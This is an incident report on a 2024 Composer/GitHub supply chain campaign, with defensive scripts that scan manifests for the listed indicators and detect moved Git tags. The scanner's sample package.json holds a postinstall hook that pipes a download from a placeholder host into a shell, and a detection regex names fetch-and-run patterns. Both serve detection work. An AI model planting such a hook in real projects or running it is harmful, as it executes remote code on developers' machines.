Full Report
Researchers identified multiple coordinated software supply chain attacks targeting Composer/Packagist packages and upstream GitHub repositories. The activity involved malicious postinstall hooks, compromised Git tags, CI/CD payload execution, and credential-stealing malware d...
Analysis Summary
# Incident Report: Supply Chain Campaign Targeting Composer and GitHub Repositories
## Executive Summary
In May 2024, researchers identified a coordinated supply chain attack affecting over 700 GitHub repositories and multiple Packagist (Composer) packages. The campaign used malicious post-install hooks and force-moved Git tags to distribute credential-stealing malware that harvested secrets from developer workstations and CI/CD pipelines. The attack was contained once the malicious commits were identified and the affected packages and tags were removed.
## Incident Details
- **Discovery Date:** May 2024
- **Incident Date:** May 2024
- **Affected Organization:** Multiple (including Laravel-Lang GitHub organization)
- **Sector:** Software Development / Open Source Ecosystem
- **Geography:** Global
## Timeline of Events
### Initial Access
- **Date/Time:** May 2024
- **Vector:** Supply Chain Compromise / Unauthorized GitHub Access
- **Details:** Attackers gained push access to specific GitHub organizations (notably Laravel-Lang) and planted malicious `postinstall` hooks in the `package.json` of repositories that ship both PHP and JavaScript, so that a routine `npm install` on a developer machine or CI runner executed the payload.
### Lateral Movement
- **Mechanism:** The malware ran on developer machines and CI/CD runners. Once a package was installed or a workflow triggered, it harvested credentials (secrets and environment variables) that could then be used to reach linked cloud accounts and deployment environments.
### Data Exfiltration/Impact
- **Details:** The primary impact was the theft of environment variables and CI/CD secrets. The malware exfiltrated gathered data to attacker-controlled infrastructure.
### Detection & Response
- **Detection:** Identified by security researchers (Socket and StepSecurity) through behavioral analysis of package updates and repository changes.
- **Response:** Notification of affected maintainers, removal of compromised Git tags, and publication of Indicators of Compromise (IoCs) to alert the developer community.
## Attack Methodology
- **Initial Access:** Compromised maintainer credentials or otherwise unauthorized GitHub push access; payload delivery and exfiltration infrastructure hosted on typosquatted domains.
- **Persistence:** Spawning detached ("orphaned") background processes that keep running after the package manager exits, so the payload survives the end of the install step.
- **Defense Evasion:** Hidden dot-files (e.g., `/tmp/.sshd`), force-rewriting Git history and tags so the malicious commit sits behind an existing version name, and deleting artifacts from disk within seconds of execution.
- **Credential Access:** Automated extraction of environment variables and repository secrets from GitHub Actions.
- **Discovery:** Automated scanning of local file systems for configuration files and secrets.
- **Impact:** Compromise of downstream software integrity and potential secondary breaches via stolen credentials.
## Impact Assessment
- **Financial:** Indirect costs related to incident response, secret rotation, and audit requirements for affected organizations.
- **Data Breach:** Exposure of sensitive CI/CD secrets, API keys, and private environment variables.
- **Operational:** Disruption of development workflows and the necessity to rebuild/verify hundreds of compromised repositories.
- **Reputational:** Erosion of trust in popular open-source utility packages within the Laravel and PHP ecosystems.
## Indicators of Compromise (IoCs)
- **Network Indicators:**
- Communications with typosquatted domains (e.g., hxxps[://]laravel-lang[.]net - *Note: Genuine site is .com or .org*)
- Traffic to unauthorized GitHub-hosted binaries.
- **File Indicators:**
- Existence of `/tmp/.sshd` (malicious binary).
- Modification of `package.json` to include suspicious `postinstall` hooks.
- Addition of `src/helpers.php` to `autoload.files` in `composer.json`.
- **Behavioral Indicators:**
- Detached background processes spawned during package installation that outlive the package manager.
- Systematic force-pushing/rewriting of all Git tags within a repository.
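The file indicators above can be checked mechanically. The following script is an added example, not the researchers' tooling or anything from the campaign: it flags npm lifecycle hooks in `package.json`, `autoload.files` entries in `composer.json` (with `src/helpers.php` matched exactly), and the `/tmp/.sshd` path on the host. The payload-pattern regex used to rank hook findings and the sample manifests are constructed assumptions, not indicators from the report.

```python
"""Scan a checkout for the manifest-level indicators listed in the IoC section.

Added example; none of this is the campaign's code or the researchers' tooling.
The PAYLOAD_PATTERNS regex and the sample manifests are constructed for triage.
"""
import json
import re
import tempfile
from pathlib import Path

# Indicators from the report.
HIDDEN_BINARY = Path("/tmp/.sshd")
SUSPICIOUS_AUTOLOAD_FILE = "src/helpers.php"
# npm runs these automatically on `npm install`; any of them can carry a payload.
NPM_LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Assumption: generic download-and-run / backgrounding patterns used to rank findings.
PAYLOAD_PATTERNS = re.compile(
    r"(curl|wget|base64\s+-d|/tmp/\.|nohup|setsid|\|\s*(ba)?sh\b)", re.IGNORECASE
)
SKIP_DIRS = {"vendor", "node_modules", ".git"}


def check_package_json(text: str) -> list[str]:
    """Return findings for npm lifecycle hooks in a package.json document."""
    try:
        manifest = json.loads(text)
    except json.JSONDecodeError as exc:
        return [f"package.json unparsable: {exc}"]
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in NPM_LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        level = "HIGH" if PAYLOAD_PATTERNS.search(cmd) else "INFO"
        findings.append(f"{level} npm hook '{hook}': {cmd}")
    return findings


def check_composer_json(text: str) -> list[str]:
    """Return findings for autoload.files entries and lifecycle scripts in composer.json."""
    try:
        manifest = json.loads(text)
    except json.JSONDecodeError as exc:
        return [f"composer.json unparsable: {exc}"]
    findings = []
    # autoload.files are require()d every time the Composer autoloader boots, not only
    # at install time, so `composer install --no-scripts` does not neutralise them.
    for path in (manifest.get("autoload") or {}).get("files") or []:
        if path == SUSPICIOUS_AUTOLOAD_FILE:
            findings.append(f"HIGH autoload.files entry '{path}' matches campaign IoC")
        else:
            findings.append(f"INFO autoload.files entry '{path}' (executes on every autoload)")
    for hook, cmds in (manifest.get("scripts") or {}).items():
        for cmd in cmds if isinstance(cmds, list) else [cmds]:
            if isinstance(cmd, str) and PAYLOAD_PATTERNS.search(cmd):
                findings.append(f"HIGH composer script '{hook}': {cmd}")
    return findings


def scan_repo(root) -> list[str]:
    """Walk a checkout (skipping vendor/, node_modules/, .git/) and collect findings."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        rel = path.relative_to(root)
        if SKIP_DIRS.intersection(rel.parts) or not path.is_file():
            continue
        if path.name == "package.json":
            checker = check_package_json
        elif path.name == "composer.json":
            checker = check_composer_json
        else:
            continue
        findings.extend(f"{rel}: {f}" for f in checker(path.read_text()))
    return findings


def check_host() -> list[str]:
    """Host-level indicator: the hidden binary path the report names."""
    return [f"HIGH {HIDDEN_BINARY} present"] if HIDDEN_BINARY.exists() else []


# Constructed manifests for demonstration (not real packages).
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-lang-tooling",
    "scripts": {
        "build": "vite build",
        "postinstall": "node -e \"require('child_process').exec('curl -s https://payload.example.invalid/x | sh &')\"",
    },
})
SAMPLE_COMPOSER_JSON = json.dumps({
    "name": "example/lang-pkg",
    "autoload": {"psr-4": {"Example\\": "src/"}, "files": ["src/helpers.php"]},
})


def demo() -> list[str]:
    """Write the constructed manifests into a temporary checkout and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "package.json").write_text(SAMPLE_PACKAGE_JSON)
        (root / "composer.json").write_text(SAMPLE_COMPOSER_JSON)
        (root / "node_modules" / "dep").mkdir(parents=True)
        (root / "node_modules" / "dep" / "package.json").write_text(SAMPLE_PACKAGE_JSON)  # skipped
        return scan_repo(root)


if __name__ == "__main__":
    for line in demo() + check_host():
        print(line)
```

Run it against a fresh clone rather than an installed tree: `node_modules/` and `vendor/` are skipped on purpose so the output reflects what the repository itself ships, which is where the force-moved tag landed. An `INFO` finding on a lifecycle hook or an `autoload.files` entry is not proof of compromise; it marks the lines a reviewer should read before merging a dependency update.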
## Response Actions
- **Containment:** Affected repositories were identified and malicious tags were removed or reverted.
- **Eradication:** Attackers' access to the Laravel-Lang organization was revoked; malicious payloads hosted on GitHub were taken down.
- **Recovery:** Development teams rotated leaked secrets and validated the integrity of their production CI/CD pipelines.
## Lessons Learned
- **Cross-Ecosystem Risks:** Security reviews often cover a project's primary ecosystem (e.g., PHP/Composer) while ignoring a secondary one (e.g., JS/npm) present in the same repository; here an npm `postinstall` hook was the entry point into PHP projects.
- **Tag Volatility:** Git tags are mutable references. Anyone with push access can delete and re-create a tag, or force-push it, so that the same version name points at a new commit; consumers who resolve dependencies by tag name pick up the new content silently.
- **CI/CD Visibility:** Without egress monitoring or allow-listing on CI/CD runners, a single outbound request from an install step can exfiltrate every secret the job can see without raising an alert.
## Recommendations
- **Immutable Dependencies:** Commit lock files and install from them: `composer.lock` pins each package to a commit `reference` (and a dist URL that embeds it) and `package-lock.json` records an `integrity` hash, so `composer install` and `npm ci` reproduce the reviewed content instead of re-resolving a tag name. Review lock-file diffs before merging.
- **Secret Management:** Implement Just-In-Time (JIT) secrets or OIDC-based workload identity for CI/CD workflows so that anything exfiltrated from a runner expires within minutes.
- **Hook Restrictions:** Run package managers with scripts disabled (`npm ci --ignore-scripts`, `composer install --no-scripts --no-plugins`) unless a build step genuinely requires them. Note that `--no-scripts` does not cover `autoload.files`: those files execute whenever the Composer autoloader is loaded, so changes to that key need the same review as a lifecycle hook.
- **Repository Monitoring:** Enable branch protection and tag protection rules (GitHub rulesets) so tags cannot be deleted or moved without review, and alert on force-push and tag deletion/re-creation events in the organization audit log.
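The "Tag Volatility" lesson and the "Immutable Dependencies" recommendation come down to one check: does the tag named in `composer.lock` still point at the commit the lock recorded? The script below is an added example, not Composer's own tooling or anything from the report. It parses the lock file and, for each source URL, the text of `git ls-remote --tags <url>` (fetched by the caller, so the block runs offline on the constructed samples), and reports tags that have moved, disappeared, or were never pinned to a commit. The package names, URLs and SHAs are made up for the demonstration.

```python
"""Detect Git tags that no longer point at the commit recorded in composer.lock.

Added example; not Composer tooling and not from the report. Sample lock and
ls-remote data below are constructed.
"""
import json
import re

SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def parse_ls_remote(text: str) -> dict[str, str]:
    """Map tag name -> commit SHA from `git ls-remote --tags` output.

    Annotated tags are listed twice: the tag object, and the same name with a
    '^{}' suffix peeled to the commit it points at. Composer records the commit,
    so the peeled SHA is the one to compare when it is present.
    """
    tags, peeled = {}, {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2 or not parts[1].startswith("refs/tags/"):
            continue
        sha, name = parts[0], parts[1][len("refs/tags/"):]
        if name.endswith("^{}"):
            peeled[name[:-3]] = sha
        else:
            tags[name] = sha
    return {name: peeled.get(name, sha) for name, sha in tags.items()}


def candidate_tags(version: str) -> list[str]:
    """Composer treats 'v1.4.0' and '1.4.0' as the same version; try both spellings."""
    v = version.strip()
    return [v, v[1:]] if v.startswith("v") else [v, "v" + v]


def find_tag_drift(lock_text: str, ls_remote_by_url: dict[str, str]) -> list[dict]:
    """Compare each locked git package against a snapshot of its remote tags."""
    lock = json.loads(lock_text)
    findings = []
    for pkg in lock.get("packages", []) + lock.get("packages-dev", []):
        src = pkg.get("source") or {}
        version = pkg.get("version", "")
        if src.get("type") != "git" or version.startswith("dev-"):
            continue  # not a git source, or a branch alias rather than a tag
        locked = src.get("reference", "")
        entry = {"name": pkg["name"], "version": version, "locked": locked, "remote": None}
        if not SHA_RE.match(locked):
            findings.append({**entry, "status": "unpinned"})
            continue
        remote_text = ls_remote_by_url.get(src.get("url"))
        if remote_text is None:
            continue  # no snapshot supplied for this remote; nothing to compare
        remote_tags = parse_ls_remote(remote_text)
        actual = next((remote_tags[t] for t in candidate_tags(version) if t in remote_tags), None)
        if actual is None:
            findings.append({**entry, "status": "missing"})
        elif actual != locked:
            findings.append({**entry, "status": "moved", "remote": actual})
    return findings


# Constructed composer.lock excerpt: three packages pinned to commits.
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "example/lang-pkg", "version": "v1.4.0",
         "source": {"type": "git", "url": "https://github.com/example/lang-pkg.git",
                    "reference": "0c4f1f3b7e3d1a9c5b2e8f6a7d9c0b1e2f3a4b5c"}},
        {"name": "example/helper", "version": "2.0.1",
         "source": {"type": "git", "url": "https://github.com/example/helper.git",
                    "reference": "9a8b7c6d5e4f3a2b1c0d9e8f7a6b5c4d3e2f1a0b"}},
        {"name": "example/theme", "version": "0.9.0",
         "source": {"type": "git", "url": "https://github.com/example/theme.git",
                    "reference": "a" * 40}},
    ]
})

# Constructed `git ls-remote --tags` output per remote. lang-pkg's v1.4.0 is an
# annotated tag that now peels to a different commit (moved); helper's tag still
# matches; theme's 0.9.0 tag has been deleted (missing).
SAMPLE_LS_REMOTE = {
    "https://github.com/example/lang-pkg.git": (
        "aa11bb22cc33dd44ee55ff66aa77bb88cc99dd00\trefs/tags/v1.3.0\n"
        "1111111111111111111111111111111111111111\trefs/tags/v1.4.0\n"
        "2222222222222222222222222222222222222222\trefs/tags/v1.4.0^{}\n"
    ),
    "https://github.com/example/helper.git": (
        "9a8b7c6d5e4f3a2b1c0d9e8f7a6b5c4d3e2f1a0b\trefs/tags/2.0.1\n"
    ),
    "https://github.com/example/theme.git": "b" * 40 + "\trefs/tags/0.8.0\n",
}


if __name__ == "__main__":
    for f in find_tag_drift(SAMPLE_LOCK, SAMPLE_LS_REMOTE):
        print(f"{f['status']:8} {f['name']} {f['version']} locked={f['locked'][:12]} remote={str(f['remote'])[:12]}")
```

To run it for real, collect `git ls-remote --tags <url>` output for each distinct `source.url` in the lock (for example via `subprocess.run`) and pass the results as the dictionary. A `moved` or `missing` result means a `composer update`, or any install not driven by this lock, would fetch content that nobody reviewed; `composer install` against the committed lock keeps using the recorded commit, which is why committing the lock file matters.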